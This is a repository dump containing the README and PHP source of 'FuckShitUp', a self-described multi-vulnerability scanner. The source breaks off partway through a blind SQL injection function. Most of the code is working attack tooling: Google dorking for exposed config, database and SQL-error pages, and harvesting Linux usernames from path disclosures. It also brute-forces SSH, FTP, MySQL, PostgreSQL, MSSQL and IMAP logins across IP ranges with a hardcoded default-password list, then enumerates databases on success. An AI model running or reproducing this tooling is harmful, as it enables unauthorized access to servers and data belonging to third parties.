├── README.md └── fsu.php /README.md: -------------------------------------------------------------------------------- 1 | 2 | ![](https://img.shields.io/badge/fuckshitup-php-purple.svg) 3 | 4 | ## Agenda 5 | 6 | FuckShitUp 0.1 - Multi Vulnerabilities Scanner 7 | 8 | Basically, FSU is a bunch of tools written in PHP-CLI. Using built-in functions, you are able to grab url's using search engines - and so, dork for interesting files and full path disclosures. Using a list of url's, the scanner will look for Cross Site Scripting, Remote File Inclusion, SQL Injection and Local File Inclusion vulnerabilities. It is able to perform mass bruteforce attacks for a specific range of hosts, or bruteforce ssh with a specific username taken from FPD. Whenever something interesting is found, like a vulnerability or broken auth credentials, the data is saved in .txt files - just like url's, and any other files. FSU is based on PHP and text files; it's still under construction, so I am aware of potential bugs. The principle of operation is simple. 9 | 10 | More url's -> more vuln's. 11 | For educational purposes only.
12 | 13 | ## Intro 14 | 15 | - Data grabbing: 16 | - URL's (geturl/massurl) -> (scan) 17 | - Configs, Databases, SQLi's (dork) 18 | - Full Path Disclosures / Users (fpds) -> (brutefpds) 19 | - Top websites info (top) 20 | 21 | - Massive scanning 22 | - XSS, SQLi, LFI, RFI (scan) 23 | - FTP, SSH, DB's, IMAP (multibruter) 24 | - Accurate SSH bruteforce (brutefpds) 25 | 26 | ## Plan 27 | 28 | - Web Apps 29 | - Grab url's via 'geturl' or 'massurl' (massurl requires a list of tags as a file) 30 | - Scan url's parameters for vulns with 'scan' 31 | 32 | - Servers 33 | - Pick a target, get its IP range 34 | - Scan for services on each IP and bruteforce with 'multibruter' 35 | - Grab full path disclosures, and thus Linux usernames 36 | - Perform SSH bruteforce for a specific user with 'brutefpds' 37 | 38 | - Info grabbing 39 | - Use 'dork' for automatic dorking 40 | - Use 'fpds' for full path disclosure grabbing 41 | - Use 'search' for searching someone in your databases 42 | - Use 'top' for scanning all top websites of a specific nation 43 | 44 | - Others 45 | - 'Stat' shows current statistics and information 46 | - 'Show' displays a specific file 47 | - 'Clear' and 'filter' - remove duplicates, remove blacklisted url's 48 | 49 | ## Others 50 | 51 | MultiBruter requirements (php5): 52 | - php5-mysql - for mysql connections 53 | - php5-pgsql - for postgresql connections 54 | - libssh2-php - for ssh connections 55 | - php5-sybase - for mssql connections 56 | - php5-imap - for imap connections 57 | 58 | Screens: 59 | - http://i.imgur.com/WKEbVGQ.png 60 | - http://i.imgur.com/PJtYWQk.png 61 | - http://i.imgur.com/o8fyyLQ.png 62 | - http://i.imgur.com/WY8ncBx.png 63 | - http://i.imgur.com/cmoTcPY.png 64 | -------------------------------------------------------------------------------- /fsu.php: -------------------------------------------------------------------------------- 1 | >\n"; 38 | print " |__| |____/ \___ >__|_ \/____ >___| /__||__| |____/| __/ \n"; 39 | print " \/ \/ \/ \/ |__| v0.1\n"; 40
| 41 | print "\n\033[0;37m"; 42 | 43 | print " .---\033[0;38m[SCAN]\033[0;37m-----------------------"."---\033[0;38m[FILES]\033[0;37m---------------------. \n"; 44 | print " | scan - Do it! |"." search - DB's serch |\n"; 45 | print " | multibruter - Brute dat bitch |"." show - Display specific file |\n";; 46 | print " | brutefpds - Brute ssh w/ fpd |"." clear - Remove duplicates |\n";; 47 | print " | stat - Status |"." filter - Filter grab results |\n"; 48 | print " |---\033[0;38m[TARGET]\033[0;37m---------------------"."---\033[0;38m[OTHERS]\033[0;37m--------------------| \n"; 49 | print " | massurl - Massive grabber |"." top - Top sites scanner |\n"; 50 | print " | dork - Well... |"." cmd - Execute OS command |\n"; 51 | print " | geturl - Grab url's |"." help - Shit's right here |\n"; 52 | print " | fpds - Grab fpds & users |"." exit - Quits |\n"; 53 | print " '--------------------------------"."-------------------------------'\n"; 54 | 55 | } 56 | 57 | function geturl() { 58 | 59 | print "\n Dork: "; 60 | $search = fopen ("php://stdin","r"); 61 | $dork = fgets($search); 62 | $dork = trim($dork); 63 | 64 | print "\n Services available: \n"; 65 | print " [1] Interia\n"; 66 | print " [2] Google\n"; 67 | print " [3] Yandex\n"; 68 | print " [4] Onet\n"; 69 | print " Use: "; 70 | 71 | $service = fopen ("php://stdin","r"); 72 | $serv = fgets($search); 73 | print "\n Pages: "; 74 | $count = fopen ("php://stdin","r"); 75 | $start = fgets($count); 76 | $start = trim($start); 77 | print "\n Output filename: "; 78 | $file = fopen ("php://stdin","r"); 79 | $filename = fgets($file); 80 | $filename = trim($filename); 81 | 82 | if($serv == 2) { 83 | 84 | print "\nGrabbing!\n\n"; 85 | 86 | $fp = fopen('out/'.$filename, 'a+'); 87 | for($i=0;$i<$start;$i++) { 88 | 89 | $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=".urlencode($dork)."&start=".$i; 90 | $body = file_get_contents($url); 91 | $json = json_decode($body); 92 | $jay = $json->responseData->results; 
93 | for($x=0;$xurl)."\n"); 95 | print urldecode($jay[$x]->url)."\n"; 96 | } 97 | } 98 | 99 | 100 | fclose($fp); 101 | 102 | } 103 | 104 | elseif($serv == 4) { 105 | 106 | $fp = fopen('out/'.$filename, 'a+'); 107 | for($i=0; $i <= $start; $i++) { 108 | 109 | $url = "http://szukaj.onet.pl/0,".$i.",query.html?qt=".urlencode($dork); 110 | if(preg_match_all("'\"]*?)\"[^>]*?>(.*?)'si", file_get_contents($url), $links, PREG_PATTERN_ORDER)) 111 | $all_hrefs = array_unique($links[1]); 112 | for($i = 0; $i <= 13; $i++) { 113 | unset($all_hrefs[$i]); 114 | } 115 | for($i = 0; $i <= 4; $i++) { 116 | array_pop($all_hrefs); 117 | } 118 | foreach($all_hrefs as $href) { 119 | fwrite($fp, urldecode($href)."\n"); 120 | print urldecode($href)."\n"; 121 | } 122 | 123 | } 124 | fclose($fp); 125 | } 126 | 127 | 128 | elseif($serv == 3) { 129 | 130 | print "\nGrabbing!\n\n"; 131 | 132 | $fp = fopen('out/'.$filename, 'a+'); 133 | 134 | for($i = 0; $i <= $start; $i++) { 135 | 136 | 137 | $url ='http://www.yandex.com/msearch?p='.$i.'&text='.urlencode($dork); 138 | //$url ='http://yandex.hohli.com/?query='.urlencode($dork).'&page='.$i; 139 | if(preg_match_all("/]*href=\"([^\"]*)\"[^>]*>(.*)<\/a>/siU", file_get_contents($url), $links, PREG_PATTERN_ORDER)) 140 | $all_hrefs = array_unique($links[1]); 141 | foreach($all_hrefs as $href) { 142 | fwrite($fp, urldecode($href)."\n"); 143 | print urldecode($href)."\n"; 144 | } 145 | 146 | } 147 | fclose($fp); 148 | } 149 | 150 | elseif($serv == 1) { 151 | 152 | print "\nGrabbing!\n\n"; 153 | 154 | $fp = fopen('out/'.$filename, 'a+'); 155 | 156 | for($i = 0; $i <= $start; $i++) { 157 | $url ='http://www.google.interia.pl/szukaj,q,'.urlencode($dork).',w,,p,'.$i; 158 | if(preg_match_all("'\"]*?)\"[^>]*?>(.*?)'si", file_get_contents($url), $links, PREG_PATTERN_ORDER)) 159 | $all_hrefs = array_unique($links[1]); 160 | for($i = 0; $i <= 6; $i++) { 161 | unset($all_hrefs[$i]); 162 | } 163 | array_pop($all_hrefs); 164 | foreach($all_hrefs as $href) { 165 | 
fwrite($fp, urldecode($href)."\n"); 166 | print urldecode($href)."\n"; 167 | } 168 | 169 | } 170 | 171 | } else { 172 | print "Wrong service number."; 173 | } 174 | } 175 | 176 | function url_get_contents ($Url) { 177 | if (!function_exists('curl_init')){ 178 | die('CURL is not installed!'); 179 | } 180 | $ch = curl_init(); 181 | curl_setopt($ch, CURLOPT_URL, $Url); 182 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 183 | $output = curl_exec($ch); 184 | curl_close($ch); 185 | return $output; 186 | } 187 | 188 | function fpds() { 189 | 190 | print "\n Options:\n"; 191 | print " wp - Wordpress fpd's\n"; 192 | print " presta - PrestaShop fpd's\n"; 193 | print " vb - vBulletin fpd's\n"; 194 | 195 | print "\n What: "; 196 | $handle = fopen ("php://stdin","r"); 197 | $line = fgets($handle); 198 | $lin = trim($line); 199 | 200 | print "\n Domain: "; 201 | $handler = fopen ("php://stdin","r"); 202 | $dom = fgets($handler); 203 | $domain = trim($dom); 204 | 205 | print "\n Pages: "; 206 | $handlerr = fopen ("php://stdin","r"); 207 | $pag = fgets($handlerr); 208 | $page = trim($pag); 209 | 210 | print "\n Output: "; 211 | $handlerrr = fopen ("php://stdin","r"); 212 | $out = fgets($handlerrr); 213 | $output = trim($out); 214 | 215 | 216 | if($lin == 'wp') { 217 | 218 | print "\nGrabbing!\n\n"; 219 | $fp = fopen('out/'.$output.'-tmp.txt', 'a+'); 220 | $dork = 'site:'.$domain.' 
inurl:"wp-includes/rss-functions.php"'; 221 | 222 | for($i=0;$i<$page;$i++) { 223 | 224 | $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=".urlencode($dork)."&start=".$i; 225 | $body = file_get_contents($url); 226 | $json = json_decode($body); 227 | $jay = $json->responseData->results; 228 | for($x=0;$xurl)), $path)) { 231 | print urldecode($jay[$x]->url).":".$path[1]."\n"; 232 | fwrite($fp, urldecode($jay[$x]->url).":".$path[1]."\n"); 233 | } 234 | 235 | } 236 | } 237 | 238 | print "\nClearing the output...\n"; 239 | 240 | passthru('sort out/'.$output.'-tmp.txt | uniq >> out/'.$output.'.txt'); 241 | passthru('rm out/'.$output.'-tmp.txt'); 242 | print "\nDone! Saved as ".$output.".txt!"; 243 | 244 | } 245 | 246 | if($lin == 'presta') { 247 | 248 | print "\nGrabbing!\n\n"; 249 | $fp = fopen('out/'.$output.'-tmp.txt', 'a+'); 250 | $dork = 'site:'.$domain.' inurl:footer.php OR inurl:header.php intext:"FrontController"'; 251 | 252 | for($i=0;$i<$page;$i++) { 253 | 254 | $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=".urlencode($dork)."&start=".$i; 255 | $body = file_get_contents($url); 256 | $json = json_decode($body); 257 | $jay = $json->responseData->results; 258 | for($x=0;$xurl)), $path)) { 261 | print urldecode($jay[$x]->url).":".$path[1]."\n"; 262 | fwrite($fp, urldecode($jay[$x]->url).":".$path[1]."\n"); 263 | } 264 | 265 | } 266 | } 267 | 268 | print "\nClearing the output...\n"; 269 | 270 | passthru('sort out/'.$output.'-tmp.txt | uniq >> out/'.$output.'.txt'); 271 | passthru('rm out/'.$output.'-tmp.txt'); 272 | print "\nDone! 
Saved as ".$output.".txt!"; 273 | 274 | } 275 | 276 | } 277 | 278 | 279 | function multibruter() { 280 | 281 | $users = array('root'); 282 | $passes = array('', 'root', 'test', 'admin', 'zaq123wsx', '1234', '12345', '123456', 'haslo', 'Password123'); 283 | $imap_users = array('postmaster', 'hostmaster', 'master', 'admin', 'administrator', 'test', 'root', 'demo'); 284 | 285 | print "\n Options:\n"; 286 | print " [1] Grab IP\n"; 287 | print " [2] Continue\n"; 288 | print " What: "; 289 | 290 | $check = fopen ("php://stdin","r"); 291 | $czk = fgets($check); 292 | $czk = trim($czk); 293 | 294 | if($czk == 1) { 295 | 296 | print "\n URL: "; 297 | $url = fopen ("php://stdin", "r"); 298 | $www = fgets($url); 299 | $www = trim($www); 300 | $ip = gethostbyname($www); 301 | print "\n IP - ".$ip."\n"; 302 | 303 | } 304 | 305 | elseif($czk == 2) { 306 | 307 | print "\n First IP: "; 308 | $fir = fopen ("php://stdin","r"); 309 | $first = fgets($fir); 310 | $first = trim($first); 311 | 312 | print "\n Last IP: "; 313 | $sec = fopen ("php://stdin","r"); 314 | $second = fgets($sec); 315 | $second = trim($second); 316 | 317 | 318 | if(ip2long($first) && ip2long($second) !== FALSE) { 319 | 320 | print "\n Options:"; 321 | print "\n [1] FTP"; 322 | print "\n [2] SSH"; 323 | print "\n [3] DB's (PgSQL,MySQL,MsSQL)"; 324 | print "\n [4] IMAP"; 325 | print "\n [5] All"; 326 | print "\n What: "; 327 | 328 | $what = fopen ("php://stdin","r"); 329 | $sup = fgets($what); 330 | $sup = trim($sup); 331 | 332 | if($sup == 1 || $sup == 5) { 333 | print "\nFTP user: "; 334 | $ftp = fopen ("php://stdin","r"); 335 | $ftpuser = fgets($ftp); 336 | $ftpuser = trim($ftpuser); 337 | } 338 | 339 | for ($ip = ip2long($first); $ip<=ip2long($second); $ip++) { 340 | 341 | print "\n \033[1;37m[+]\033[0;37m ".long2ip($ip)."\n"; 342 | 343 | if($sup == 1 || $sup == 5) { 344 | if($checkftp = @fsockopen(long2ip($ip), 21, $errno, $errstr, 5)){ 345 | print "\n - FTP found on port 21\n"; 346 | $ftpconn = 
ftp_connect(long2ip($ip)); 347 | if(ftp_login($ftpconn, 'anonymous', '')) { 348 | $text = date('j/y - G:i') . " - FTP - " . long2ip($ip) . " - Anonymous login\n"; 349 | $handle = fopen('out/multibruter.txt', 'a+'); 350 | fwrite($handle, $text); 351 | fclose($handle); 352 | 353 | print "\033[1;37mAnonymous login allowed!\033[0;37m\n"; 354 | print " - General info\n"; 355 | print " Files in directory (".ftp_pwd($ftpconn).") :\n"; 356 | $ftpfiles = ftp_rawlist($ftpconn, ftp_pwd($ftpconn)); 357 | foreach ($ftpfiles as $plik) { 358 | print $plik."\n"; 359 | } 360 | ftp_close($ftpconn); 361 | } else { 362 | print " - FTP anonymous login not allowed\n"; 363 | ftp_close($ftpconn); 364 | } 365 | 366 | 367 | if($ftpuser != '') { 368 | print "\n Bruteforcing...\n"; 369 | foreach ($passes as $haslo){ 370 | $ftpconn = ftp_connect(long2ip($ip)); 371 | if(ftp_login($ftpconn, $ftpuser, $haslo)) { 372 | $text = date('j/y - G:i') . " - FTP - " . long2ip($ip) . " - ".$ftpuser.":".$haslo."\n"; 373 | $handle = fopen('out/multibruter.txt', 'a+'); 374 | fwrite($handle, $text); 375 | fclose($handle); 376 | 377 | print "\033[1;37m" . $ftpuser . ':' . $haslo . " - Success!\033[0;37m\n"; 378 | print " - General info\n"; 379 | print " Current directory - ".ftp_pwd($ftpconn)."\n"; 380 | print " Files in directory:\n"; 381 | $ftpfiles = ftp_rawlist($ftpconn, ftp_pwd($ftpconn)); 382 | foreach ($ftpfiles as $plik) { 383 | echo $plik."\n"; 384 | } 385 | ftp_close($ftpconn); 386 | break; 387 | } else { 388 | echo $ftpuser . ':' . $haslo . 
"\n"; 389 | } 390 | } 391 | } else { 392 | print "\nFTP user is not defined, wont bruteforce.\n"; 393 | } 394 | 395 | } else { 396 | print "\n - FTP seems not working (21)\n"; 397 | } 398 | } 399 | 400 | if($sup == 2 || $sup == 5) { 401 | 402 | if($checkssh = fsockopen(long2ip($ip), 22, $errno, $errstr, 5)) { 403 | print "\n - SSH found on port 22\n"; 404 | print "\n Bruteforcing...\n"; 405 | 406 | $sshconn = ssh2_connect(long2ip($ip), 22); 407 | 408 | foreach ($users as $uzytkownik){ 409 | foreach ($passes as $haslo){ 410 | 411 | if(ssh2_auth_password($sshconn, $uzytkownik, $haslo)) 412 | { 413 | print "\033[1;37m" . $uzytkownik . ':' . $haslo . " - Success! \033[0;37m\n"; 414 | $text = date('j/y - G:i') . " - SSH - " . long2ip($ip) . " - ".$uzytkownik.":".$haslo."\n"; 415 | $handle = fopen('out/multibruter.txt', 'a+'); 416 | fwrite($handle, $text); 417 | fclose($handle); 418 | ssh2_exec($sshconn, 'exit'); 419 | break; 420 | } else { 421 | print $uzytkownik . ":" . $haslo . "\n"; 422 | } 423 | 424 | } 425 | } 426 | } else { 427 | print "\n - SSH seems not working (22)\n"; 428 | } 429 | 430 | } 431 | 432 | 433 | if($sup == 3 || $sup == 5) { 434 | 435 | if ($checkmssql = fsockopen(long2ip($ip), 1433, $errno, $errstr, 5)) { 436 | print "\n - MsSQL found on port 1433\n"; 437 | print "\n Bruteforcing...\n"; 438 | $mssqluser = 'sa'; 439 | foreach ($passes as $haslo) { 440 | $mssqlconn = mssql_connect(long2ip($ip), $mssqluser, $haslo); 441 | if($mssqlconn) { 442 | 443 | print "\033[1;37m" . $mssqluser . ':' . $haslo . " - Success! \033[0;37m\n"; 444 | $text = date('j/y - G:i') . " - MsSQL - " . long2ip($ip) . " - ".$mssqluser.":".$haslo."\n"; 445 | $handle = fopen('out/multibruter.txt', 'a+'); 446 | fwrite($handle, $text); 447 | fclose($handle); 448 | 449 | pg_close($mssqlconn); 450 | } else { 451 | print $mssqluser . ':' . $haslo . 
"\n"; 452 | } 453 | } 454 | } else { 455 | print "\n - MsSQL seems not working (1433)\n"; 456 | } 457 | 458 | if(fsockopen(long2ip($ip), 3306, $errno, $errstr, 5)){ 459 | print "\n - MySQL found on port 3306. \n"; 460 | print "\n Bruteforcing...\n"; 461 | foreach ($users as $uzytkownik){ 462 | foreach ($passes as $haslo){ 463 | $conn = mysql_connect(long2ip($ip), $uzytkownik, $haslo); 464 | if ($conn) { 465 | 466 | print "\033[1;37m" . $uzytkownik . ':' . $haslo . " - Success! \033[0;37m\n"; 467 | $text = date('j/y - G:i') . " - MySQL - " . long2ip($ip) . " - ".$mssqluser.":".$haslo."\n"; 468 | $handle = fopen('out/multibruter.txt', 'a+'); 469 | fwrite($handle, $text); 470 | fclose($handle); 471 | 472 | $dbuser = mysql_query("SELECT USER();"); 473 | $dbuzer = mysql_fetch_row($dbuser); 474 | $dbdb = mysql_query("SELECT DATABASE();"); 475 | $dbd = mysql_fetch_row($dbdb); 476 | print "\nGeneral info\n"; 477 | print "MySql version - ".mysql_get_client_info()."\n"; 478 | print "Host info - ".mysql_get_host_info()."\n"; 479 | print "Current user - ".$dbuzer[0]."\n"; 480 | 481 | print "\nDatabases\n"; 482 | $res = mysql_query("SHOW DATABASES"); 483 | 484 | while ($row = mysql_fetch_assoc($res)) { 485 | print $row['Database'] . "\n"; 486 | } 487 | 488 | mysql_close($conn); 489 | break; 490 | } else { 491 | print $uzytkownik . ':' . $haslo . "\n"; 492 | } 493 | } 494 | 495 | } 496 | } else { 497 | print "\n - MySQL seems not working (3306)\n"; 498 | } 499 | 500 | $checkpgsql = fsockopen(long2ip($ip), 5432, $errno, $errstr, 5); 501 | if($checkpgsql){ 502 | print "\n - PostgreSQL found on port 5432\n"; 503 | print "\n Bruteforcing...\n"; 504 | $pguser = 'postgres'; 505 | foreach ($passes as $haslo) { 506 | $pgconn = pg_connect("host=".long2ip($ip)." user=".$pguser." password=".$haslo); 507 | if ($pgconn) { 508 | 509 | print "\033[1;37m" . $pguser . ':' . $haslo . " - Success! \033[0;37m\n"; 510 | $text = date('j/y - G:i') . " - PgSQL - " . long2ip($ip) . 
" - ".$pguser.":".$haslo."\n"; 511 | $handle = fopen('out/multibruter.txt', 'a+'); 512 | fwrite($handle, $text); 513 | fclose($handle); 514 | 515 | print "\nGeneral info\n"; 516 | print "Version - ".pg_version($pgconn)."\n"; 517 | print "Host - ".pg_host($pgconn)."\n"; 518 | pg_close($pgconn); 519 | } else 520 | { 521 | print $pguser . ':' . $haslo . "\n"; 522 | } 523 | } 524 | 525 | } else { 526 | print "\n - PostgreSQL seems not working (5432)\n"; 527 | } 528 | } 529 | 530 | if($sup == 4 || $sup == 5) { 531 | 532 | if ($checkimap = fsockopen(long2ip($ip), 143, $errno, $errstr, 5)) { 533 | print "\n - IMAP found on port 143 \n"; 534 | print "\n Bruteforcing...\n"; 535 | foreach ($imap_users as $uzytkownik) { 536 | foreach ($passes as $haslo) { 537 | $mailbox = imap_open("{".long2ip($ip).":143}", $uzytkownik, $haslo); 538 | if ($mailbox) { 539 | print "\033[1;37m" . $uzytkownik . ':' . $haslo . " - Success! \033[0;37m\n"; 540 | $text = date('j/y - G:i') . " - IMAP - " . long2ip($ip) . " - ".$uzytkownik.":".$haslo."\n"; 541 | $handle = fopen('out/multibruter.txt', 'a+'); 542 | fwrite($handle, $text); 543 | fclose($handle); 544 | imap_close($mailbox); 545 | break; 546 | } else { 547 | print $uzytkownik . ":" . $haslo . "\n"; 548 | } 549 | } 550 | 551 | } 552 | } else { 553 | print "\n - IMAP seems not working (143)\n"; 554 | } 555 | 556 | } 557 | 558 | } 559 | 560 | 561 | 562 | } else { 563 | print "\nWrong IP adress.\n"; 564 | } 565 | } 566 | } 567 | 568 | function brutefpds() { 569 | 570 | print "\n FPD's file: "; 571 | $handle = fopen ("php://stdin","r"); 572 | $fil = fgets($handle); 573 | $file = trim($fil); 574 | 575 | if(file_exists('out/'.$file)) { 576 | 577 | $lines = file('out/'.$file); 578 | foreach($lines as $line) { 579 | 580 | $stuff = explode(':', $line); 581 | $url = $stuff[0].':'.$stuff[1]; 582 | $url = parse_url($url); 583 | 584 | print "\n [+] Trying ".$url['host']." 
(".gethostbyname($url['host']).") with user ".$stuff[2]."\n"; 585 | 586 | if($checkssh = fsockopen(gethostbyname($url['host']), 22, $errno, $errstr, 5)) { 587 | print "- SSH found on port 22\n"; 588 | print "\n Bruteforcing...\n"; 589 | 590 | $sshconn = ssh2_connect(gethostbyname($url['host']), 22); 591 | $uzytkownik = trim($stuff[2]); 592 | $passes = array('', 'root', 'test', 'admin', 'zaq123wsx', '1234', '12345', '123456', 'haslo', 'Password123'); 593 | 594 | foreach ($passes as $haslo){ 595 | 596 | if(ssh2_auth_password($sshconn, $uzytkownik, $haslo)) 597 | { 598 | print "\033[1;37m" . $uzytkownik . ':' . $haslo . " - Success! \033[0;37m\n"; 599 | $text = date('j/y - G:i') . " - SSH - " . gethostbyname($url['host']) . " - ".$uzytkownik.":".$haslo."\n"; 600 | $handle = fopen('out/brutedfpds.txt', 'a+'); 601 | fwrite($handle, $text); 602 | fclose($handle); 603 | ssh2_exec($sshconn, 'exit'); 604 | break; 605 | } else { 606 | print $uzytkownik . ":" . $haslo . "\n"; 607 | } 608 | 609 | } 610 | 611 | } else { 612 | print " - SSH seems not working (22)\n"; 613 | } 614 | 615 | } 616 | 617 | } else { 618 | print "\nFile doesn't exist!\n"; 619 | } 620 | 621 | } 622 | 623 | function dork() { 624 | 625 | print "\n Options: \n"; 626 | print " [1] Configs (inc,bak,old)\n"; 627 | print " [2] Databases - (sql,configs)\n"; 628 | print " [3] SQLi (error based)\n"; 629 | print " What: "; 630 | 631 | $choice = fopen ("php://stdin","r"); 632 | $what = fgets($choice); 633 | 634 | 635 | print "\n Options:\n"; 636 | print " [1] Display\n"; 637 | print " [2] Save to file\n"; 638 | print " [3] Both\n"; 639 | print " What: "; 640 | 641 | $sup = fopen ("php://stdin","r"); 642 | $yo = fgets($sup); 643 | 644 | print "\n"; 645 | 646 | for($i = 0; $i <=3 ; $i++) { 647 | if($what == 1) { 648 | 649 | $url1 = 'http://www.google.interia.pl/szukaj,q,'.urlencode('ext:bak').',w,pl,p,'.$i; 650 | $url2 = 'http://www.google.interia.pl/szukaj,q,'.urlencode('ext:inc').',w,pl,p,'.$i; 651 | $url3 = 
'http://www.google.interia.pl/szukaj,q,'.urlencode('ext:old').',w,pl,p,'.$i; 652 | $shit = array($url1, $url2, $url3); 653 | } 654 | if($what == 2) { 655 | $url1 = 'http://www.google.interia.pl/szukaj,q,'.urlencode('ext:sql').',w,pl,p,'.$i; 656 | $url2 = 'http://www.google.interia.pl/szukaj,q,'.urlencode('ext:inc mysql_connect').',w,pl,p,'.$i; 657 | $url2 = 'http://www.google.interia.pl/szukaj,q,'.urlencode('ext:inc mysql_pconnect').',w,pl,p,'.$i; 658 | $shit = array($url1, $url2, $url3); } 659 | if($what == 3) { 660 | $url1 = 'http://www.google.interia.pl/szukaj,q,'.urlencode('intext:"error in your SQL syntax" " .php').',w,pl,p,'.$i; 661 | $url2 = 'http://www.google.interia.pl/szukaj,q,'.urlencode('intext:"supplied argument is not a valid MySQL" " .php').',w,pl,p,'.$i; 662 | $shit = array($url1, $url2, $url3); 663 | } 664 | foreach($shit as $url) { 665 | if (preg_match("/(youtube)/(facebook)|(lastfm)/(github)/(wikipedia)/(stackoverflow)/(wykop)/(filmweb)/(allegro)/", $url) == FALSE) { 666 | if(preg_match_all("'\"]*?)\"[^>]*?>(.*?)'si", file_get_contents($url), $links, PREG_PATTERN_ORDER)) 667 | $all_hrefs = array_unique($links[1]); 668 | unset($all_hrefs[0]); 669 | unset($all_hrefs[1]); 670 | unset($all_hrefs[2]); 671 | unset($all_hrefs[3]); 672 | unset($all_hrefs[4]); 673 | unset($all_hrefs[5]); 674 | unset($all_hrefs[6]); 675 | array_pop($all_hrefs); 676 | foreach($all_hrefs as $href) { 677 | if($yo == 2 || $yo == 3) { 678 | $fp = fopen('out/'.'d0rks.txt', 'a+'); 679 | $text = date('j/y - G:i') . " - " . 
urldecode($href); 680 | fwrite($fp, $text."\n"); 681 | fclose($fp); 682 | } 683 | if ($yo == 1 || $yo == 3) { 684 | print " - ".urldecode($href)."\n"; 685 | } 686 | } 687 | 688 | } 689 | } 690 | } 691 | 692 | } 693 | 694 | function top() { 695 | 696 | print "\n Options:\n"; 697 | print " [1] Display urls\n"; 698 | print " [2] Grab some info\n"; 699 | print " What: "; 700 | 701 | $what = fopen ("php://stdin","r"); 702 | $sup = fgets($what); 703 | $sup = trim($sup); 704 | 705 | print "\n Domain: "; 706 | $dmn = fopen ("php://stdin","r"); 707 | $domain = fgets($dmn); 708 | $domain = strtoupper(trim($domain)); 709 | 710 | if($sup == 2) { 711 | $crawl = array('.htaccess', 'sql/', 'phpmyadmin/', 'robots.txt', 'info.php', 'administrator/', 'admin/', 'cms/', 'server-status/', 'config.php.bak', 'index.php.bak'); 712 | $ports = array(21, 22, 23, 25, 53, 80, 110, 143, 443, 465, 3690, 1433, 3306, 5432, 8080); 713 | $x = 0; 714 | for($i=0; $i<=20; $i++) { 715 | 716 | $url = 'http://www.alexa.com/topsites/countries;'.$i.'/'.$domain; 717 | 718 | if(preg_match_all("'(.*?)'si", file_get_contents($url), $links, PREG_PATTERN_ORDER)) 719 | $all_hrefs = array_unique($links[1]); 720 | foreach($all_hrefs as $href) { 721 | 722 | if(strpos($href, "siteinfo")) { 723 | $uri = explode("/", $href); 724 | $adres = urldecode($uri[2]); 725 | $x++; 726 | print "\n $x. ".$adres." - ".gethostbyname($adres)."\n"; 727 | 728 | print "\nOpen ports: "; 729 | foreach($ports as $port) { 730 | if($look = @fsockopen(gethostbyname($adres), $port, $err, $err_string, 1)) { 731 | echo $port.', '; 732 | fclose($look); 733 | } 734 | } 735 | 736 | 737 | print "\nCrawling...\n"; 738 | foreach ($crawl as $url) { 739 | $urlnew = 'http://'.$adres.'/'.$url; 740 | $ch = curl_init($urlnew); 741 | curl_setopt($ch, CURLOPT_NOBODY, true); 742 | curl_exec($ch); 743 | $status = curl_getinfo($ch, CURLINFO_HTTP_CODE); 744 | 745 | if($status == 200){ 746 | echo " ".$url." 
(".$status.")\n"; 747 | } 748 | curl_close($ch); 749 | } 750 | 751 | passthru('dig any '.$adres); 752 | 753 | 754 | 755 | } 756 | } 757 | } 758 | } elseif($sup == 1) { 759 | 760 | $x = 0; 761 | 762 | for($i=0; $i<=20; $i++) { 763 | 764 | $url = 'http://www.alexa.com/topsites/countries;'.$i.'/'.$domain; 765 | 766 | if(preg_match_all("'(.*?)'si", file_get_contents($url), $links, PREG_PATTERN_ORDER)) 767 | $all_hrefs = array_unique($links[1]); 768 | foreach($all_hrefs as $href) { 769 | if(strpos($href, "siteinfo")) { 770 | $uri = explode("/", $href); 771 | $adres = urldecode($uri[2]); 772 | $x++; 773 | print $x.'. '.$adres."\n"; 774 | 775 | } 776 | } 777 | } 778 | 779 | } 780 | } 781 | 782 | 783 | function filter() { 784 | 785 | print "\n File: "; 786 | $filet = fopen ("php://stdin","r"); 787 | $file = fgets($filet); 788 | $file = trim($file); 789 | 790 | if(file_exists('out/'.$file)) { 791 | 792 | $urls = file('out/'.$file); 793 | $urls = array_unique($urls); 794 | foreach($urls as $url) { 795 | // if (preg_match("/(filmweb)/(forum)/(hip-hop.pl)/(youtube)/(facebook)|(lastfm)/(github)/(wikipedia)/(stackoverflow)/(wykop)/(allegro)/", $url) == FALSE && strpos($url, "=")) { 796 | if (preg_match('#\b(filmweb|forum|google|reddit|hip-hop.pl|youtube|facebook|lastfm|github|wikipedia|stackoverflow|wykop|allegro|phpbb|simplemachines|smf)\b#', $url) == FALSE && strpos($url, "=")) { 797 | $fp = fopen('out/filtered-'.$file, 'a+'); 798 | fwrite($fp, $url."\n"); 799 | fclose($fp); 800 | } 801 | 802 | } 803 | print "\n\nDone! 
Saved as filtered-".$file."\n"; 804 | } else { 805 | print "\nFile doesn't exist!"; 806 | } 807 | 808 | } 809 | 810 | function massurl() { 811 | 812 | print "\n Tags: "; 813 | $filet = fopen ("php://stdin","r"); 814 | $tags = fgets($filet); 815 | $tags = trim($tags); 816 | print "\n Output: "; 817 | $fileo = fopen ("php://stdin","r"); 818 | $output = fgets($fileo); 819 | $output = trim($output); 820 | 821 | if(file_exists('out/'.$tags)) { 822 | 823 | $tags = file('out/'.$tags); 824 | foreach($tags as $tag) { 825 | for($i = 0;$i < 3; $i++) { 826 | $url = 'http://www.google.interia.pl/szukaj,q,'.$tag.' .php'.',w,pl,p,'.$i; 827 | if(preg_match_all("'\"]*?)\"[^>]*?>(.*?)'si", file_get_contents($url), $links, PREG_PATTERN_ORDER)) 828 | { 829 | $all_hrefs = array_unique($links[1]); 830 | unset($all_hrefs[0]); 831 | unset($all_hrefs[1]); 832 | unset($all_hrefs[2]); 833 | unset($all_hrefs[3]); 834 | unset($all_hrefs[4]); 835 | unset($all_hrefs[5]); 836 | unset($all_hrefs[6]); 837 | array_pop($all_hrefs); 838 | foreach($all_hrefs as $href) { 839 | $fp = fopen('out/'.$output, 'a+'); 840 | $text = urldecode($href)."\n"; 841 | fwrite($fp, $text); 842 | print " - ".urldecode($href)."\n"; 843 | 844 | } 845 | } 846 | } 847 | } 848 | 849 | 850 | 851 | } else { 852 | print "\nFile ".$tags." doesnt exist!"; 853 | } 854 | 855 | } 856 | 857 | function blind_sqli($link) { 858 | $cleanHashCode = hash_file(file_get_contents($link)); 859 | 860 | //first check if website is dynamic 861 | 